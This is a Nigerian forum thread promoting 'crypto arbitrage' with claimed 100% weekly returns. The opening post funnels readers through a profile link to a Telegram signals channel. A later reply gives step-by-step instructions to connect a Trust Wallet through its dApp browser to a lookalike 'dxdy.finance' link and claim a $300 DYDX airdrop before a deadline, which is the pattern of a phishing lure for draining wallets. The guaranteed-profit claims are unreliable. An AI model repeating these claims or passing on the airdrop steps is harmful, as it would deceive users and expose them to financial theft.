Welcome, Guest: Register On Nairaland / LOGIN! / Trending / Recent / New
Stats: 3,150,317 members, 7,808,069 topics. Date: Thursday, 25 April 2024 at 06:37 AM

Crypto Arbitrage - Make 100% Weekly - Investment - Nairaland

Nairaland Forum / Nairaland / General / Investment / Crypto Arbitrage - Make 100% Weekly (2562 Views)

Hotbit Arbitrage: Make $100 Daily With This Strategy / Crypto Arbitrage - Make $100 Daily With This Strategy / I Swear It Is A Legit Business To Make 100% Profit Every 15days (2) (3) (4)

(1) (Reply) (Go Down)

Crypto Arbitrage - Make 100% Weekly by Josele01(m): 11:52am On Nov 20, 2021
Hey guys,

I initially posted this in the business section but thought this might be the best place to talk about it.
So I recently came across this telegram channel where I learnt how to arbitrage coins on bitmart. So I decided to try it out and it worked but y'all know how arbitrage works, the more people get into it, the more the opportunity thins out and it eventually vanishes away so I had to make some good bucks first before sharing it with the public cheesy (pardon me grin )

Please note, I am not charging anybody any kobo for this info, so please do not release your money to any scammer out there. Freely I received and freely I am giving

I will not be able to give the most accurate description of the entire process so I'll share a link to the telegram channel so you can get the first hand information yourself. Seeing how nairaland frowns at sharing links, I chose to make things a tad bit easier for y'all. Use the link in my bio/signature/profile. It will take you to a small website I created, when you get there just click on the Get Started button, it'll take you directly to the telegram channel.

As a side note, I must say that this channel is bomb and God will bless the person that introduced me to it embarassed . You'll really gain a lot if you're serious with it. Binance futures signals, spot signals, even very accurate shitcoin signals. And I repeat, it's all for FREE!!
Neither I nor the owner of the website will ask you for a dime, so if anyone does know that you're talking to a scammer. Kindly block the perosn and run!!!

Now back to topic, knowing how arbitrage works, once a lot of persons get into it, the chances keep reducing so when you see this do not waste any time to get into it
I'll attach pictures from the recent futures and shitcoin calls so you see what I'm talking about
Best of luck y'all!!
When you see what I've spoken about don't forget to come here and share your testimony grin

Re: Crypto Arbitrage - Make 100% Weekly by Fabulous0(m): 3:39pm On Dec 10, 2021
I was unable to find the arbitrage details on channel, can you help with a screenshot maybe
Re: Crypto Arbitrage - Make 100% Weekly by Ssdd: 8:12pm On Dec 10, 2021
Automating
Re: Crypto Arbitrage - Make 100% Weekly by Josele01(m): 3:48pm On Dec 22, 2021
Fabulous0:
I was unable to find the arbitrage details on channel, can you help with a screenshot maybe

Hi. If you are having difficulty locating the video I suggest you check the group description, there is a link to a youtube channel where all the videos are also present. You will definitely find it there
Re: Crypto Arbitrage - Make 100% Weekly by Plus10(m): 6:12pm On Dec 23, 2021
UPDATE FOR CRPTO LOVERS!

1. Open your trust wallet

2. Open ethereum, copy address

3. Go to DAPPS SECTION

4. Open this link on the search box ��
https://dxdy.finance/EPQK4L9

5. Click on airdrop and paste the ethereum address.
6. Get 10 DYDX TOKEN worth 300$

Pls do this as soon as youj can. it will end on 24th of this month and withdrawal is immediately.

Don't miss this one ✅
Re: Crypto Arbitrage - Make 100% Weekly by autofreak2020(m): 9:39pm On Mar 18, 2023
Arbitrage trading is real, and when you find the opportunity, it is incredible.

However, the chances of getting good crypto arbitrage is now slim, but it still exists.

Like to understand the current situation of Cryptocurrency Arbitrage In Nigeria, I suggest that you watch this exclusive video now.

https://www.youtube.com/watch?v=fuq7a0_5kbI

(1) (Reply)

Sell Your Litecoin And Ripple To Pufftech Exchange Now / Poultry Farming Business Plan In Nigeria PDF 2020 / Ur Tots On High Interest rates on fixed deposits in Microfinance Banks

(Go Up)

Sections: politics (1) business autos (1) jobs (1) career education (1) romance computers phones travel sports fashion health
religion celebs tv-movies music-radio literature webmasters programming techmarket

Links: (1) (2) (3) (4) (5) (6) (7) (8) (9) (10)

Nairaland - Copyright © 2005 - 2024 Oluwaseun Osewa. All rights reserved. See How To Advertise. 15
Disclaimer: Every Nairaland member is solely responsible for anything that he/she posts or uploads on Nairaland.